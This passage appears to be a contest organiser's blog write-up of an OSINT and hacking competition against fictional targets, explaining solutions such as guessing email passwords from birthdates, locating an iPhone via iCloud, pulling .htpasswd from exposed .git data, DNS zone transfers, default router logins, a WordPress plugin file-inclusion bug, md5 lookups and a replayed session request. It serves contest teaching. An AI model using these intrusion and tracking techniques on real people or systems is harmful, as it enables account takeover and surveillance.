fact, we thought that the contest's participants would find her on Badoo first, then get her into talking and make her spill her secrets. Only one participant added her to his friends list (probably by accident), and no one tried to speak to her. And of course there were several fake accounts that confused the participants and made them choose wrong answers.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-nLOv6wvaniM/U8YgsvHGXNI/AAAAAAAAEL0/9Fu-xI8Yrus/s1600/%D0%91%D0%B5%D0%B7+%D0%BD%D0%B0%D0%B7%D0%B2%D0%B0%D0%BD%D0%B8%D1%8F25.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://2.bp.blogspot.com/-nLOv6wvaniM/U8YgsvHGXNI/AAAAAAAAEL0/9Fu-xI8Yrus/s1600/%D0%91%D0%B5%D0%B7+%D0%BD%D0%B0%D0%B7%D0%B2%D0%B0%D0%BD%D0%B8%D1%8F25.png" height="137" width="400" /></a></div><div class="separator" style="clear: both; text-align: center;"><br /></div><div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-ssb8EzN62Fo/U8YgzLq4fKI/AAAAAAAAEL8/YxBYC56RgMU/s1600/%D0%91%D0%B5%D0%B7+%D0%BD%D0%B0%D0%B7%D0%B2%D0%B0%D0%BD%D0%B8%D1%8F26.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://2.bp.blogspot.com/-ssb8EzN62Fo/U8YgzLq4fKI/AAAAAAAAEL8/YxBYC56RgMU/s1600/%D0%91%D0%B5%D0%B7+%D0%BD%D0%B0%D0%B7%D0%B2%D0%B0%D0%BD%D0%B8%D1%8F26.png" height="240" width="400" /></a></div><div class="separator" style="clear: both; text-align: center;"><br /></div><br /><b>Solved by:</b> 2 participants<br /><br /><b>Points:</b> 30<br /><br /><b>3.2 The iPhone gives away the Indian taxi driver</b><br /><br /><b>Nickname:</b> IndianTaxi-driver<br /><br /><b>About:</b> Counsel, his brother, should know everything about him. The password for the counsel's email is ... wait … his birth day! What a freaking surprise!<br /><br />To discover all about the taxi driver, the participants needed to get access to his brother's e-mail. The participants who solved the third task knew his birthdate. The driver's e-mail login and password were stored in his brother's mail,<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-8n6dw0ywNQU/U8YhDxpQQrI/AAAAAAAAEME/kCWpmguqAv8/s1600/%D0%91%D0%B5%D0%B7+%D0%BD%D0%B0%D0%B7%D0%B2%D0%B0%D0%BD%D0%B8%D1%8F27.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://3.bp.blogspot.com/-8n6dw0ywNQU/U8YhDxpQQrI/AAAAAAAAEME/kCWpmguqAv8/s1600/%D0%91%D0%B5%D0%B7+%D0%BD%D0%B0%D0%B7%D0%B2%D0%B0%D0%BD%D0%B8%D1%8F27.png" height="75" width="400" /></a></div><br /> and here we found out that he uses Apple devices.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-g1MNPjTPcnE/U8YhJWLSujI/AAAAAAAAEMM/MM-5Z6hXGcg/s1600/%D0%91%D0%B5%D0%B7+%D0%BD%D0%B0%D0%B7%D0%B2%D0%B0%D0%BD%D0%B8%D1%8F28.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://2.bp.blogspot.com/-g1MNPjTPcnE/U8YhJWLSujI/AAAAAAAAEMM/MM-5Z6hXGcg/s1600/%D0%91%D0%B5%D0%B7+%D0%BD%D0%B0%D0%B7%D0%B2%D0%B0%D0%BD%D0%B8%D1%8F28.png" height="26" width="400" /></a></div><br /> The iCloud account matched the e-mail (anyway, we got access to the e-mail and could restore the data). After logging into the iCloud account, the participants just needed to detect the iPhone that the organizers "had sent" to Delhi.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-pYRH_vDukmg/U8YhRcZBYCI/AAAAAAAAEMU/EKYTxOX_FlA/s1600/%D0%91%D0%B5%D0%B7+%D0%BD%D0%B0%D0%B7%D0%B2%D0%B0%D0%BD%D0%B8%D1%8F29.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://4.bp.blogspot.com/-pYRH_vDukmg/U8YhRcZBYCI/AAAAAAAAEMU/EKYTxOX_FlA/s1600/%D0%91%D0%B5%D0%B7+%D0%BD%D0%B0%D0%B7%D0%B2%D0%B0%D0%BD%D0%B8%D1%8F29.png" height="287" width="400" /></a></div><br /><b>Solved by: </b>2 participants<br /><br /><b>Points:</b> 40<br /><br /><b>3.3. The Admin's having a little fun</b><br /><br /><b>Nickname:</b> Admin<br /><br /><b>About:</b> The admin of <a href="http://wwidol.com/">wwidol.com</a>.<br /><br />Google says that there's a folder /.git/ on wwidol.com, which contains an index and a config file, where we can find the admin's login for GitHub! That's a stroke of luck!<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-o61F3T62vMU/U8YhjYqRC9I/AAAAAAAAEMc/kqyXFrP3Y64/s1600/%D0%91%D0%B5%D0%B7+%D0%BD%D0%B0%D0%B7%D0%B2%D0%B0%D0%BD%D0%B8%D1%8F30.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://3.bp.blogspot.com/-o61F3T62vMU/U8YhjYqRC9I/AAAAAAAAEMc/kqyXFrP3Y64/s1600/%D0%91%D0%B5%D0%B7+%D0%BD%D0%B0%D0%B7%D0%B2%D0%B0%D0%BD%D0%B8%D1%8F30.png" height="246" width="400" /></a></div><div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-Va-F1ZbbGhg/U8YhqOEK6yI/AAAAAAAAEMk/_qAS26h56cU/s1600/%D0%91%D0%B5%D0%B7+%D0%BD%D0%B0%D0%B7%D0%B2%D0%B0%D0%BD%D0%B8%D1%8F31.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://3.bp.blogspot.com/-Va-F1ZbbGhg/U8YhqOEK6yI/AAAAAAAAEMk/_qAS26h56cU/s1600/%D0%91%D0%B5%D0%B7+%D0%BD%D0%B0%D0%B7%D0%B2%D0%B0%D0%BD%D0%B8%D1%8F31.png" height="226" width="400" /></a></div><br />After googling the nickname we found out that the admin has two accounts on GitHub, one for work and another one just for fun. It was the second repository where the .htpasswd file could be found as well as the IP address where the file was located.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-HGwwNugt588/U8YhxBU1WBI/AAAAAAAAEMs/LpKVrmB-vjk/s1600/%D0%91%D0%B5%D0%B7+%D0%BD%D0%B0%D0%B7%D0%B2%D0%B0%D0%BD%D0%B8%D1%8F32.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://3.bp.blogspot.com/-HGwwNugt588/U8YhxBU1WBI/AAAAAAAAEMs/LpKVrmB-vjk/s1600/%D0%91%D0%B5%D0%B7+%D0%BD%D0%B0%D0%B7%D0%B2%D0%B0%D0%BD%D0%B8%D1%8F32.png" height="87" width="400" /></a></div><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-uzZVYe3An0M/U8Yh2iDJtrI/AAAAAAAAEM0/Evcx792p5A0/s1600/%D0%91%D0%B5%D0%B7+%D0%BD%D0%B0%D0%B7%D0%B2%D0%B0%D0%BD%D0%B8%D1%8F33.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://3.bp.blogspot.com/-uzZVYe3An0M/U8Yh2iDJtrI/AAAAAAAAEM0/Evcx792p5A0/s1600/%D0%91%D0%B5%D0%B7+%D0%BD%D0%B0%D0%B7%D0%B2%D0%B0%D0%BD%D0%B8%D1%8F33.png" height="147" width="400" /></a></div><br />The IP address matches the site wwidol.com, which means that the admin stores other files on the WWIdol server. But on what host? If a participant issued an AXFR request by this time, he should know about host src.wwidol.com, if not then it's high time to either bruteforce the third-level domains or to issue a zone transfer request.<br /><br />The password was easily guessed: it was "admin", and it was enough to get all the data about the admin in the file /about-me.txt.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-qoVo8ZQZNCE/U8Yh9DorVrI/AAAAAAAAEM8/l7aR00rMygI/s1600/%D0%91%D0%B5%D0%B7+%D0%BD%D0%B0%D0%B7%D0%B2%D0%B0%D0%BD%D0%B8%D1%8F34.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://1.bp.blogspot.com/-qoVo8ZQZNCE/U8Yh9DorVrI/AAAAAAAAEM8/l7aR00rMygI/s1600/%D0%91%D0%B5%D0%B7+%D0%BD%D0%B0%D0%B7%D0%B2%D0%B0%D0%BD%D0%B8%D1%8F34.png" height="260" width="400" /></a></div><b>Solved by:</b> 3 participants<br /><br /><b>Points:</b> 30<br /><br /><b>3.4. The admin and the cop are connected</b><br /><br /><b>Nickname:</b> Cop<br /><br /><b>About:</b> Admin and Cop are somehow connected. Errr, but how? Gosh..<br /><br />Let's check the file src.wwidol.com/note.txt. Here we find login, password and a web camera's IP address, from which we will find out everything about the cop from a delivery invoice.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-yl6-qVTkqKE/U8YiJxkoORI/AAAAAAAAENE/z8daag-9FcI/s1600/%D0%91%D0%B5%D0%B7+%D0%BD%D0%B0%D0%B7%D0%B2%D0%B0%D0%BD%D0%B8%D1%8F35.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://4.bp.blogspot.com/-yl6-qVTkqKE/U8YiJxkoORI/AAAAAAAAENE/z8daag-9FcI/s1600/%D0%91%D0%B5%D0%B7+%D0%BD%D0%B0%D0%B7%D0%B2%D0%B0%D0%BD%D0%B8%D1%8F35.png" height="340" width="400" /></a></div><br /><b>Solved by:</b> 3 participants<br /><br /><b>Points:</b> 20<br /><br /><b>3.4. When an anonymizer doesn't help</b><br /><br /><b>Nickname:</b> ParanoidHacker<br /><br /><b>Hint: </b>The hacker uses an anonymizer but his DNS requests absolutely don't resolve. We know for sure that during daytime the hacker is at his so called "official" job, but still doing nasty things from there. He's also running his own website that doesn't look hackproof, so you can hackproove it.<br /><br />The hacker's mail is at the bottom of <a href="http://wwidol.com/">wwidol.com</a>.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-G9BM8YkDqyk/U8Yia7n4pgI/AAAAAAAAENM/KnLbtIPCVYM/s1600/%D0%91%D0%B5%D0%B7+%D0%BD%D0%B0%D0%B7%D0%B2%D0%B0%D0%BD%D0%B8%D1%8F36.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://4.bp.blogspot.com/-G9BM8YkDqyk/U8Yia7n4pgI/AAAAAAAAENM/KnLbtIPCVYM/s1600/%D0%91%D0%B5%D0%B7+%D0%BD%D0%B0%D0%B7%D0%B2%D0%B0%D0%BD%D0%B8%D1%8F36.png" height="267" width="400" /></a></div><br />If we try to send him a link (as we did in task 2.5), he will follow it via an anonymizer (we mentioned it in the hint published on the third day). However, DNS queries to our resources will be sent from the hacker's resources.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-UFolH8i4Rjk/U8YinAWuhXI/AAAAAAAAENU/VfOnnIxhETI/s1600/%D0%91%D0%B5%D0%B7+%D0%BD%D0%B0%D0%B7%D0%B2%D0%B0%D0%BD%D0%B8%D1%8F37.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://1.bp.blogspot.com/-UFolH8i4Rjk/U8YinAWuhXI/AAAAAAAAENU/VfOnnIxhETI/s1600/%D0%91%D0%B5%D0%B7+%D0%BD%D0%B0%D0%B7%D0%B2%D0%B0%D0%BD%D0%B8%D1%8F37.png" height="23" width="400" /></a></div><br />These resources were located behind an office router with default accounts. admin:admin.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-pewwX5V32f4/U8YitNlu_MI/AAAAAAAAENc/FfCRxVXGFp4/s1600/%D0%91%D0%B5%D0%B7+%D0%BD%D0%B0%D0%B7%D0%B2%D0%B0%D0%BD%D0%B8%D1%8F38.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://1.bp.blogspot.com/-pewwX5V32f4/U8YitNlu_MI/AAAAAAAAENc/FfCRxVXGFp4/s1600/%D0%91%D0%B5%D0%B7+%D0%BD%D0%B0%D0%B7%D0%B2%D0%B0%D0%BD%D0%B8%D1%8F38.png" height="97" width="400" /></a></div><br />The router's logs showed that the hacker visited homehekkers.com, a homemade site based on a WordPress template with the installed dewplayer plugin vulnerable to LFI:<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-x7pUZJt3gGk/U8YjChWQ48I/AAAAAAAAENs/1FZyD500hdE/s1600/%D0%91%D0%B5%D0%B7+%D0%BD%D0%B0%D0%B7%D0%B2%D0%B0%D0%BD%D0%B8%D1%8F39.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://4.bp.blogspot.com/-x7pUZJt3gGk/U8YjChWQ48I/AAAAAAAAENs/1FZyD500hdE/s1600/%D0%91%D0%B5%D0%B7+%D0%BD%D0%B0%D0%B7%D0%B2%D0%B0%D0%BD%D0%B8%D1%8F39.png" height="123" width="400" /></a></div><div class="separator" style="clear: both; text-align: center;"><br /></div><br />What's more, <a href="http://homehekkers.com/">homehekkers.com</a> and <a href="http://wwidol.com/">wwidol.com</a> are hosted on the same IP address (what a coincidence!), which means that we can find out everything about the hacker from the file /tmp/dump.sql (Hello Moscow!).<br /><br /><b>Solved by:</b> 0 participants<br /><b><br /></b><b>Points:</b> 50<br /><br /><b>3.4. Somebody's leaking information to ATH</b><br /><br /><b>Nickname:</b> rat<br /><br /><b>About:</b> Here is the list of potential rat's accounts at the forum http://anneximous.com/rat.txt. Find me the rat!<br /><br /><b>Hint:</b> Once upon a time there was and is Google mail. Stories were written and songs were composed 'bout Google mail remembering even the things one wouldn't suspect. And they all lived happily ever after. The question is who are "they"…?<br /><br />The last task in this set was to find the rat from ATH infested in Anneximous. The participants are given lists of potential betrayers: email:md5(pass). Only one hash can be easily googled:<br /><br /><span style="font-family: Courier New, Courier, monospace;">kevinreissen@wwidol.com:09d1d20bd495912ed5307a08510440d6 (Admin111)</span><br /><br />wwidol.com supports mail accounts via Google Apps, which can be determined by using nslookup.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-OU3seHbYQhI/U8YjVKJpGhI/AAAAAAAAEN0/x9FtMgaV3Bc/s1600/%D0%91%D0%B5%D0%B7+%D0%BD%D0%B0%D0%B7%D0%B2%D0%B0%D0%BD%D0%B8%D1%8F40.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://3.bp.blogspot.com/-OU3seHbYQhI/U8YjVKJpGhI/AAAAAAAAEN0/x9FtMgaV3Bc/s1600/%D0%91%D0%B5%D0%B7+%D0%BD%D0%B0%D0%B7%D0%B2%D0%B0%D0%BD%D0%B8%D1%8F40.png" height="113" width="400" /></a></div><br />After logging in using this Gmail account, a contestant could found detailed information about an IMAP query from the device com.android.email and get the rat's IP address.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-6cfHNJbYJag/U8Yjc_mDmjI/AAAAAAAAEN8/MQaYC0jnkM8/s1600/%D0%91%D0%B5%D0%B7+%D0%BD%D0%B0%D0%B7%D0%B2%D0%B0%D0%BD%D0%B8%D1%8F41.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://2.bp.blogspot.com/-6cfHNJbYJag/U8Yjc_mDmjI/AAAAAAAAEN8/MQaYC0jnkM8/s1600/%D0%91%D0%B5%D0%B7+%D0%BD%D0%B0%D0%B7%D0%B2%D0%B0%D0%BD%D0%B8%D1%8F41.png" height="228" width="400" /></a></div><br />And then the contestant was able to access to the computer in the internal network and get all the necessary information using a vulnerability in ATH's router.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-f3PxSCCsYwk/U8Yjh-IlIMI/AAAAAAAAEOE/0NcJUja3OmA/s1600/%D0%91%D0%B5%D0%B7+%D0%BD%D0%B0%D0%B7%D0%B2%D0%B0%D0%BD%D0%B8%D1%8F42.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://1.bp.blogspot.com/-f3PxSCCsYwk/U8Yjh-IlIMI/AAAAAAAAEOE/0NcJUja3OmA/s1600/%D0%91%D0%B5%D0%B7+%D0%BD%D0%B0%D0%B7%D0%B2%D0%B0%D0%BD%D0%B8%D1%8F42.png" height="45" width="400" /></a></div><br /><b>Solved by:</b> 0 participants<br /><br /><b>Points:</b> 20<br /><br /><b><span style="font-size: large;">4. Finishing spurt</span></b><br /><br />We're coming to the end of our story about competitive intelligence researchers. The participants needed to get information about the rat from ATH settled in WWidol and about bosses of Anneximous and WWidol.<br /><br /><b>4.1. wwidolRat</b><br /><b><br /></b><b>Nickname:</b> wwidolRat<br /><br /><b>About:</b> Info: rat's report at <a href="http://athc.biz/docs/f4dd947b925ef548fcdfd66789174033.docx">http://athc.biz/docs/f4dd947b925ef548fcdfd66789174033.docx</a>.<br /><br />The participants were offered the rat's report. Meta tags can be used to find the IP address and to gain useful information from the computer in ATH's network once again.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-LdbtcgRdnFI/U8Yj5wDKWjI/AAAAAAAAEOM/TKZHffCAgcI/s1600/%D0%91%D0%B5%D0%B7+%D0%BD%D0%B0%D0%B7%D0%B2%D0%B0%D0%BD%D0%B8%D1%8F43.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://1.bp.blogspot.com/-LdbtcgRdnFI/U8Yj5wDKWjI/AAAAAAAAEOM/TKZHffCAgcI/s1600/%D0%91%D0%B5%D0%B7+%D0%BD%D0%B0%D0%B7%D0%B2%D0%B0%D0%BD%D0%B8%D1%8F43.png" height="257" width="400" /></a></div><div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-YGZUz3iEfFM/U8YkIK1wxwI/AAAAAAAAEOU/cBBzxwW-Xv0/s1600/%D0%91%D0%B5%D0%B7+%D0%BD%D0%B0%D0%B7%D0%B2%D0%B0%D0%BD%D0%B8%D1%8F44.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://1.bp.blogspot.com/-YGZUz3iEfFM/U8YkIK1wxwI/AAAAAAAAEOU/cBBzxwW-Xv0/s1600/%D0%91%D0%B5%D0%B7+%D0%BD%D0%B0%D0%B7%D0%B2%D0%B0%D0%BD%D0%B8%D1%8F44.png" height="65" width="400" /></a></div><br />Moreover, there's an archive with some data on the rat's computer, but unfortunately it's password-protected.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-2REx6kQVVkI/U8YkOafYzPI/AAAAAAAAEOc/nSn9d_ayIHI/s1600/%D0%91%D0%B5%D0%B7+%D0%BD%D0%B0%D0%B7%D0%B2%D0%B0%D0%BD%D0%B8%D1%8F45.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://4.bp.blogspot.com/-2REx6kQVVkI/U8YkOafYzPI/AAAAAAAAEOc/nSn9d_ayIHI/s1600/%D0%91%D0%B5%D0%B7+%D0%BD%D0%B0%D0%B7%D0%B2%D0%B0%D0%BD%D0%B8%D1%8F45.png" height="85" width="400" /></a></div>It turned out that the rat has its own site, but it's blocked by ATH for some reason.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-t-v7LIQGR2M/U8YkWr_x8eI/AAAAAAAAEOk/ry7C9EJmGgs/s1600/%D0%91%D0%B5%D0%B7+%D0%BD%D0%B0%D0%B7%D0%B2%D0%B0%D0%BD%D0%B8%D1%8F46.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://4.bp.blogspot.com/-t-v7LIQGR2M/U8YkWr_x8eI/AAAAAAAAEOk/ry7C9EJmGgs/s1600/%D0%91%D0%B5%D0%B7+%D0%BD%D0%B0%D0%B7%D0%B2%D0%B0%D0%BD%D0%B8%D1%8F46.png" height="82" width="400" /></a></div><br />If we query the IP address using domain names (kevin-donnalley.com and images.kevin-donnalley.com), we got it:<br /><div class="separator" style="clear: both; text-align: center;"><br /></div><div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-jdOqbd3JzRw/U8YkeXzCtEI/AAAAAAAAEOs/cbrPuuU8dQk/s1600/%D0%91%D0%B5%D0%B7+%D0%BD%D0%B0%D0%B7%D0%B2%D0%B0%D0%BD%D0%B8%D1%8F47.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://4.bp.blogspot.com/-jdOqbd3JzRw/U8YkeXzCtEI/AAAAAAAAEOs/cbrPuuU8dQk/s1600/%D0%91%D0%B5%D0%B7+%D0%BD%D0%B0%D0%B7%D0%B2%D0%B0%D0%BD%D0%B8%D1%8F47.png" height="235" width="400" /></a></div><br />Now we're checking thumbs.db and find out the rat's base64_encode(facebook_id):<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-9mN2V1zQ-Z0/U8YkmkUsP7I/AAAAAAAAEO0/eEkRSvAg-0w/s1600/%D0%91%D0%B5%D0%B7+%D0%BD%D0%B0%D0%B7%D0%B2%D0%B0%D0%BD%D0%B8%D1%8F48.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://2.bp.blogspot.com/-9mN2V1zQ-Z0/U8YkmkUsP7I/AAAAAAAAEO0/eEkRSvAg-0w/s1600/%D0%91%D0%B5%D0%B7+%D0%BD%D0%B0%D0%B7%D0%B2%D0%B0%D0%BD%D0%B8%D1%8F48.png" height="195" width="400" /></a></div><div class="separator" style="clear: both; text-align: center;"><br /></div><div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-__b9RfBIJVY/U8YkzeG0H5I/AAAAAAAAEO8/kjOySjuARmo/s1600/%D0%91%D0%B5%D0%B7+%D0%BD%D0%B0%D0%B7%D0%B2%D0%B0%D0%BD%D0%B8%D1%8F49.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://4.bp.blogspot.com/-__b9RfBIJVY/U8YkzeG0H5I/AAAAAAAAEO8/kjOySjuARmo/s1600/%D0%91%D0%B5%D0%B7+%D0%BD%D0%B0%D0%B7%D0%B2%D0%B0%D0%BD%D0%B8%D1%8F49.png" height="252" width="400" /></a></div><div class="separator" style="clear: both; text-align: center;"><br /></div><b>Solved by:</b> 2 participants<br /><br /><b>Points:</b> 20<br /><br /><b>4.2. Seizing power in the band</b><br /><b><br /></b><b>Nickname:</b> Anneximous Boss<br /><br /><b>About:</b> empty<br /><br /><b>Hint:</b> You can use accounts 4000–4040 with the pass “phdIV @107.170.92.105”, but you still need to find boss' nickname ;)<br /><br />There's a direct link to the folder with reports' images in the rat's report:<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-hvS4uE5j1uQ/U8YlDIZKmRI/AAAAAAAAEPE/YO9MC4yMkQM/s1600/%D0%91%D0%B5%D0%B7+%D0%BD%D0%B0%D0%B7%D0%B2%D0%B0%D0%BD%D0%B8%D1%8F50.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://4.bp.blogspot.com/-hvS4uE5j1uQ/U8YlDIZKmRI/AAAAAAAAEPE/YO9MC4yMkQM/s1600/%D0%91%D0%B5%D0%B7+%D0%BD%D0%B0%D0%B7%D0%B2%D0%B0%D0%BD%D0%B8%D1%8F50.png" height="308" width="400" /></a></div><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-wr7YxwJZg1A/U8YlKFDhyvI/AAAAAAAAEPM/YepcJTZTbPk/s1600/%D0%91%D0%B5%D0%B7+%D0%BD%D0%B0%D0%B7%D0%B2%D0%B0%D0%BD%D0%B8%D1%8F51.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://1.bp.blogspot.com/-wr7YxwJZg1A/U8YlKFDhyvI/AAAAAAAAEPM/YepcJTZTbPk/s1600/%D0%91%D0%B5%D0%B7+%D0%BD%D0%B0%D0%B7%D0%B2%D0%B0%D0%BD%D0%B8%D1%8F51.png" height="215" width="400" /></a></div><br />In this folder we can detect some new identifiers of reports and then try to access the reports.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-5QCAPQvO24Y/U8YlUVuOVuI/AAAAAAAAEPU/VYJDULMGcE0/s1600/%D0%91%D0%B5%D0%B7+%D0%BD%D0%B0%D0%B7%D0%B2%D0%B0%D0%BD%D0%B8%D1%8F52.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://4.bp.blogspot.com/-5QCAPQvO24Y/U8YlUVuOVuI/AAAAAAAAEPU/VYJDULMGcE0/s1600/%D0%91%D0%B5%D0%B7+%D0%BD%D0%B0%D0%B7%D0%B2%D0%B0%D0%BD%D0%B8%D1%8F52.png" height="332" width="400" /></a></div><br />Here we found a report on Anneximous and WWIdol's bosses with a password and traffic dump. We open the query:<br /><br /><span style="font-family: Courier New, Courier, monospace;">POST /profile.php?PHPSESSID=055e9c961e311901050b261e16ef57aa HTTP/1.1</span><br /><span style="font-family: Courier New, Courier, monospace;">Host: anneximous.com</span><br /><span style="font-family: Courier New, Courier, monospace;">Cookie: PHPSESSID=055e9c961e311901050b261e16ef57aa;</span><br /><span style="font-family: Courier New, Courier, monospace;">Accept: */*</span><br /><span style="font-family: Courier New, Courier, monospace;">Accept-Language: en</span><br /><span style="font-family: Courier New, Courier, monospace;">User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)</span><br /><span style="font-family: Courier New, Courier, monospace;">Connection: close</span><br /><br />If we repeat the query, we will know the name and SIP account of the Anneximous boss.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-OyCivM71SZo/U8Ylg3YvgQI/AAAAAAAAEPc/lGLS3QXPLwk/s1600/%D0%91%D0%B5%D0%B7+%D0%BD%D0%B0%D0%B7%D0%B2%D0%B0%D0%BD%D0%B8%D1%8F53.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://3.bp.blogspot.com/-OyCivM71SZo/U8Ylg3YvgQI/AAAAAAAAEPc/lGLS3QXPLwk/s1600/%D0%91%D0%B5%D0%B7+%D0%BD%D0%B0%D0%B7%D0%B2%D0%B0%D0%BD%D0%B8%D1%8F53.png" height="131" width="400" /></a></div><br /><br /><b>Solved by: </b>0 participants<br /><br /><b>Points:</b> 55<br /><br /><b>4.3. Surprise</b><br /><br /><b>Nickname:</b> Wwidol Boss<br /><br /><b>About:</b> empty<br /><br />The boss's SIP would seem unnecessary, cause we already got all data for filling the form. If anyone of the participants reached this task, called the boss (johanson@107.170.92.105) and examined the traffic, he or she would notice that packets started to flow through 128.199.236.23 — host boss.wwidol.com. It turned out that the bosses of Anneximous and WWIdol are the same person. What a twist in the plot!<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-ltX7v8EhesE/U8YlvA-DvlI/AAAAAAAAEPk/BE5r2JzQuMk/s1600/%D0%91%D0%B5%D0%B7+%D0%BD%D0%B0%D0%B7%D0%B2%D0%B0%D0%BD%D0%B8%D1%8F54.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://2.bp.blogspot.com/-ltX7v8EhesE/U8YlvA-DvlI/AAAAAAAAEPk/BE5r2JzQuMk/s1600/%D0%91%D0%B5%D0%B7+%D0%BD%D0%B0%D0%B7%D0%B2%D0%B0%D0%BD%D0%B8%D1%8F54.png" height="173" width="400" /></a></div><br /> Now we can try to send the same query with the same password (bosses being only human like to use same passwords) to wwidol.com, and find his "nickname" on WWidol.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-Fy7_vU5dTIc/U8YmKTB6ilI/AAAAAAAAEPs/QCDHBFZo2Qs/s1600/%D0%91%D0%B5%D0%B7+%D0%BD%D0%B0%D0%B7%D0%B2%D0%B0%D0%BD%D0%B8%D1%8F55.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://1.bp.blogspot.com/-Fy7_vU5dTIc/U8YmKTB6ilI/AAAAAAAAEPs/QCDHBFZo2Qs/s1600/%D0%91%D0%B5%D0%B7+%D0%BD%D0%B0%D0%B7%D0%B2%D0%B0%D0%BD%D0%B8%D1%8F55.png" height="166" width="400" /></a></div><br /><br />P. S. No one reached this task, but one of the winners managed to guess the boss's nickname using the very first report and to call him.<br /><br /><b>Solved by:</b> 0 participants<br /><br /><b>Points:</b> 30<br /><br />The contest was finished at 7:00 pm on May 17 (it lasted three days instead of the planned two days), though some participants offered their answers after the contest was over. 301 participants registered to compete in the contest, 82 solved the intro task. Other details are available in the table below.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-kYDmF5IbWuk/U8YmWaCKVTI/AAAAAAAAEP0/qR8elIQ8nPo/s1600/%D0%A1%D0%BD%D0%B8%D0%BC%D0%BE%D0%BA+%D1%8D%D0%BA%D1%80%D0%B0%D0%BD%D0%B0+2014-07-16+%D0%B2+11.14.16.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" 